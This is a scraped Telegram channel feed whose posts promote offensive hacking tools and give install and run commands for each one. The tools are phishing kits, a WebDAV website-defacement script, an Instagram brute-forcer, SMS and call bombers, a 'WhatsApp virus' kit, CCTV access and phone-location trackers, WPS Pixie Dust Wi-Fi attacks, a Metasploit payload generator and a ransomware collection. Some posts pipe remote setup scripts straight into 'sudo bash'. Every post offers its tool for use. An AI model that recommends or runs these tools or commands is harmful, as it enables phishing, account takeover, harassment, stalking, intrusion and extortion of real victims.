TERMUX COMMANDD
25.5K subscribers
553 photos
80 videos
10 files
157 links
πŸ₯‡THIS IS THE TOP TERMUX CHANNEL ON TELEGRAM WITH 1000+ TOOLSπŸͺ©

πŸšͺHOUSE OF PENTESTER

⚑ Β©ALL CONTENT PROVIDED BY THIS CHANNEL IS MEANT FOR EDUCATIONAL PURPOSES ONLYπŸ”Ί


ADS - @MARONADS
Download Telegram
NIKTO – WEB APP SCANNER

This tool is developed in Perl whose aim is to give advice on the web servers which fall into the category of vulnerability scanners.

It was designed with the purpose to find out different kinds of configurations, files, standard or insecure programs on the web servers.

Now keep in mind that it not only shall look for SQL injection problems or improper authorizations but will also open port or active the firewalls. It shall scan the site for interesting files and settings which could be passive to the attack.


TERMUX COMMANDS

apt update && apt upgrade pkg install git pkg install perl git clone https://github.com/sullo/nikto.git cd nikto cd program

Replace <target website> with the site on which you wish to run the scan

Perl nikto.pI –h securedyou.co

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘20❀4πŸ₯°1πŸ‘1😁1
SOCIAL MEDIA & CAMERA HACKING & WHATSAPP VIRUS & SMS BOMBING

INSTALLATION TERMUX

apt update
apt install git
git clone https://github.com/rixon-cochi/hacking-tool.git
cd hacking-tool
bash install.sh
bash tools.sh


sh tools.sh not work
./
tools.sh not work

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘29🀬6😑5πŸ”₯2❀1
A shark is a tool that will help you do Phishing in an advanced way so no one checks and identify that you are doing phishing.For those guys who Don't know about Phishing let me explain "Phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords, by disguising oneself as a trustworthy entity in an electronic communication. Typically carried out by email spoofing, instant messaging, and text messaging, phishing often directs users to enter personal information at a fake website which matches the look and feel of the legitimate site. as shown in MR ROBOT.

Uses ngrok - cloudflare Which helps in port forwarding. Soon will add more

Installation of Shark πŸŽ›οΈ

Debian (kali, Ubuntu ..etc )πŸ‘‡

sudo apt update -y && sudo apt upgrade -y
sudo wget -qO- https://github.com/Bhaviktutorials/shark/raw/master/setup | sudo bash

TERMUX INSTALLATION

Termux From Playstore will not work check wikiπŸ‘‡
⚠️Termux Wikipedia⚠️

🚧Note : Your Packages are Up-to-date.
πŸ‘32😑11❀3πŸ”₯2πŸ₯°2πŸ‘2
TERMUX COMMANDD
A shark is a tool that will help you do Phishing in an advanced way so no one checks and identify that you are doing phishing.For those guys who Don't know about Phishing let me explain "Phishing is the fraudulent attempt to obtain sensitive information or…
pkg update -y
pkg install wget -y
wget -qO- https://github.com/Bhaviktutorials/shark/raw/master/setup | bash

WindowsπŸ‘‡

sudo wget -qO- https://github.com/Bhaviktutorials/shark/raw/master/setup | sudo bash

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘20πŸ‘Ž7❀6πŸ‘3😑3⚑2
TOOLSIG (INSTAGRAM TOOLS)

DEFAULT OR BASIC USAGE

$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js


TUTORIAL ON PC/LAPTOP [OS]

# Download & Install Git for Windows (32/64bit)
# Download & Install NodeJs for Windows (Recommend Use NodeJS LTS (32/64bit))
# Download File toolsig (https://s.id/2yGC6) & Extract the file
# Right Click (Mouse/Touchpad) In "toolsig-master" Folder & Choose Git Bash Here!
$ npm i
$ node index.js


TUTORIAL ON TERMUX [ANDROID]

$ pkg upgrade && pkg update
$ pkg install git
$ pkg install nodejs-lts
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js


Tutorial on C9io/CodeAnywhere [WEB-CLOUD-BASED]

$ Login c9.io/login | https://codeanywhere.com/login
$ Select & Install Workspace + Package NodeJS
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js
πŸ‘27❀2πŸ”₯2πŸ₯°2πŸ‘Ž1
TERMUX COMMANDD
TOOLSIG (INSTAGRAM TOOLS) DEFAULT OR BASIC USAGE $ git clone https://github.com/officialputuid/toolsig.git $ cd toolsig $ npm i $ node index.js TUTORIAL ON PC/LAPTOP [OS] # Download & Install Git for Windows (32/64bit) # Download & Install NodeJs for Windows…
INFORMATION TOOLS

βž₯ Bot Like Timeline
βž₯ Bot Like Target User
βž₯ Mass Delete Post/Photo
βž₯ F-L -> Followers Target [NEW]
βž₯ L-C -> Followers Target [NEW]
βž₯ F-L-C -> Followers Target
βž₯ F-L-C -> Followers Target [BETA]
βž₯ F-L-C -> Followers Target v2
βž₯ F-L-DM -> Followers Target
βž₯ F-L-DM -> Followers Target [BETA]
βž₯ F-L-C -> Hashtag Target
βž₯ F-L-C -> Location Target
βž₯ Unfollow All Following
βž₯ Unfollow Not Followback

πŸ›ˆ F-L = Follow & Like
πŸ›ˆ F-L-C = Follow, Like & Comment
πŸ›ˆ F-L-DM = Follow, Like & Direct Message

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘25πŸ‘11πŸ₯°7❀5πŸ‘Ύ5😁3
PAYBAG
Simple and easy Metasploit payload generator for Linux & Termux

INSTALLATIONπŸŽ›οΈ

πŸ–²οΈFor Linux users -

sudo apt-get install python3 python3-pip net-tools

git clone https://github.com/Deadpool2000/Paybag.git

cd Paybag

sudo pip3 install -r requirements.txt

python3 paybag.py

πŸ–²οΈFor Termux users -

apt install python wget

git clone https://github.com/Deadpool2000/Paybag.git

cd Paybag

pip install -r requirements.txt

python paybag.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘37❀2πŸ‘1
Mr.Holmes is a information gathering tool (OSINT). The main purpose is to gain information about domains,username and phone numbers with the help of public source avaiable on the internet also it use the google dorks attack for specific researchers. It also use proxies for make your requests completley anonymous and a WhoIS Api for getting more information about a domain.

βœ”οΈ INSTALLATION LINUX/MAC:
git clone https://github.com/Lucksi/Mr.Holmes
cd Mr.Holmes
sudo chmod +x install.sh
sudo ./install.sh


βœ”οΈ INSTALLATION WINDOWS:
git clone https://github.com/Lucksi/Mr.Holmes
cd Mr.Holmes
Install.cmd


βœ”οΈ INSTALLATION TERMUX:
pkg install proot
git clone https://github.com/Lucksi/Mr.Holmes
cd Mr.Holmes
proot -0 chmod +x install_Termux.sh
./install_Termux.sh


USAGE LINUX/MAC:
sudo python3 MrHolmes.py
OR:
cd Launchers
Execute Launcher.sh


USAGE TERMUX/WINDOWS:
python3 MrHolmes.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘37❀4πŸ”₯4πŸ₯°2
CCTV_Hack for tool.

With this tool you will get the link of CC camera of any country in the world and you can see it live and this tool can be useful for you during war in any country.

πŸ”½Install Linux / Termux

apt upgrade & update -y
apt install python3 git -y
git clone https://github.com/Raz-Ahamed/CCTV_Hack
pip install -r requirements.txt
cd CCTV_Hack
chmod +x *
python3 cctv.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘32❀7πŸ”₯1πŸ‘1
This is a simple tool to automatically deface vulnerable websites.
It uses WebDav vulnerability to exploit. This script sends a PUT requests to the websites given in the targets.txt file. Unauthenticated requests will be accepted and your html script will be uploaded in the website. You will get the link with your script whch you can see it. (sometimes it defaces the homepage directly.)
You need to put your website urls in the targets.txt file and put your deface script in the same folder ie: white-deface. then use the tool

Installation
$ apt update -y && apt upgrade -y
$ pkg install git -y
$ pkg install python -y
$ pip2 install requests
$ git clone https://github.com/WH1T3-E4GL3/white-deface.git
$ cd white-deface
$ pip install -r requirements.txt
$ git pull
$ python white-deface.py
πŸ‘25❀2πŸ”₯1
TERMUX COMMANDD
This is a simple tool to automatically deface vulnerable websites. It uses WebDav vulnerability to exploit. This script sends a PUT requests to the websites given in the targets.txt file. Unauthenticated requests will be accepted and your html script will…
Single installation command

apt update -y && apt upgrade -y && pkg install git -y && pkg install python -y && pip2 install requests && git clone https://github.com/WH1T3-E4GL3/white-deface.git && cd white-deface && pip install -r requirements.txt && git pull && python white-deface.py

Tutorial video πŸŽ₯ : https://mega.nz/file/obgWGQJJ#Lk-JkEdFoIZVC07lpbRAFHRt3WayXDfPW27KuEDgCJE

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘13πŸ‘3
The best tool to get the location of a phone number. Available for all countries (BUILDING)

πŸ”½INSTALLATION
git clone https://github.com/WhBeatZ/GeonumWh.git
cd GeonumWh
bash requirements.sh


πŸ”½Quick Install:β€Œβ€Œ

git clone https://github.com/WhBeatZ/GeonumWh.git && cd GeonumWh && chmod +x * && bash requirements.sh

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘52πŸ‘Ž12❀11πŸ”₯4πŸ₯°2πŸ‘1
Fake mail generator for the termux,kali,windows

Termux installation
apt update && apt upgrade
*pkg install nodejs-lts
*git clone https://github.com/princekrvert/Temp-mail.git
*cd Temp-mail
*npm install
*chmod +x *
*node temp.js username

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘22❀2😁1
Bash2Mp4 is a tool to Download Videos.This tool can Download Videos from more than 20 sites.

Installation
apt update
apt install git -y
git clone https://github.com/htr-tech/bash2mp4
cd bash2mp4
bash setup.sh

Type b2mp4 to run the Tool

Or, Use Single Command

apt update && apt install git -y && git clone https://github.com/htr-tech/bash2mp4 && cd bash2mp4 && bash setup.sh && b2mp4

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘18❀2πŸ‘Ž2πŸ’©2😁1πŸ‘Œ1
A tool for instagram brutforce attack on termux and kali-linux

Installation cmd

apt update && apt upgrade
pkg install git
git clone https://github.com/princekrvert/inninja.git
cd inninja
chmod +x *
./setup.sh

Now open the new session and run the tor.
./inninja.sh

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘27πŸ‘Ž10πŸ₯°3❀2😁2
SMS/CALL BOMBER

INSTALLATION

TERMUX πŸ”½
pkg upgrade -y
pkg update -y
pkg install git
pkg install python -y
pip install --upgrade pip
git clone https://github.com/Lucky1376/ORION-Bomber
cd ORION-Bomber
pip install -r requirements.txt
python main.py


RESTART
cd
cd ORION-Bomber
python main.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘22❀13πŸ†3🀬2πŸ‘Ž1πŸ‘1
GhostTrack
Useful tool to track location or mobile number, so this tool can be called osint or also information gathering

Instalation on Linux (deb

sudo apt-get install git
sudo apt-get install python3

Instalation on Termux
pkg install git
pkg install python3

Usage Tool
git clone https://github.com/HunxByts/GhostTrack.git
cd GhostTrack
pip3 install -r requirements.txt
python3 GhostTR.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘24❀11πŸ₯°4πŸ€”4
Hack WIfi Using Termux! (Requires Root)

ManuallyπŸ”½
Installing requirements
pkg install -y root-repo
pkg install -y git tsu python wpa-supplicant pixiewps iw openssl

Getting WifiHackπŸ”½
git clone --depth 1 https://github.com/BINOD-XD/WifiHack
cd WifiHack

RunningπŸ”Έ
sudo python binod.py -i wlan0 -K

One line Command
sudo python WifiHack/binod.py -i wlan0 -K

Usage examplesπŸ”½
Start Pixie Dust attack on a specified BSSID
sudo python3 binod.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

Show avaliable networks and start Pixie Dust attack on a specified network:
sudo python3 binod.py -i wlan0 -K

Launch online WPS bruteforce with the specified first half of the PIN:
sudo python3 binod.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

Start WPS push button connection:
sudo python3 binod.py -i wlan0 --pbc

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘47❀15❀‍πŸ”₯6πŸ‘Ž4πŸ”₯1πŸ‘1
Ransomwares Collection. Don't Run Them on Your Device.

Installation πŸ’Ώ

git clone https://github.com/Err0r-ICA/Ransomware
cd Ransomware
python3 Ransomware

⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘19😁7πŸ”₯4❀3
CyberPhish
A heavily armed customizable phishing tool

INSTALLATION:
apt install python3
pip install colorama
git clone https://github.com/Cyber-Dioxide/CyberPhish
cd CyberPhish
ls
chmod +x *
python3 CyberPhish.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘24πŸ‘Ž13πŸ”₯7❀5πŸ‘2😁2
SMSBOX is a tool to send anonymous messages, written by TrollSkull. This script uses the Textbelt API to work, Textbelt is an API that allows us to send a single message per day on a single IP.

INSTALLATION
You can download SMSBOX on any platform by cloning the official Git repository:

$ apt install -y git python

$ git clone https://github.com/TrollSkull/SMSBOX

$ cd SMSBOX

$ python smsbox.py


⚠️ For more information and use of this tool in termux visit github link of this tool.

NOW ENJOY AND USE THE TOOL... 🫑 @TERMUXCOMMANDD
πŸ‘28❀7πŸ‘Ž4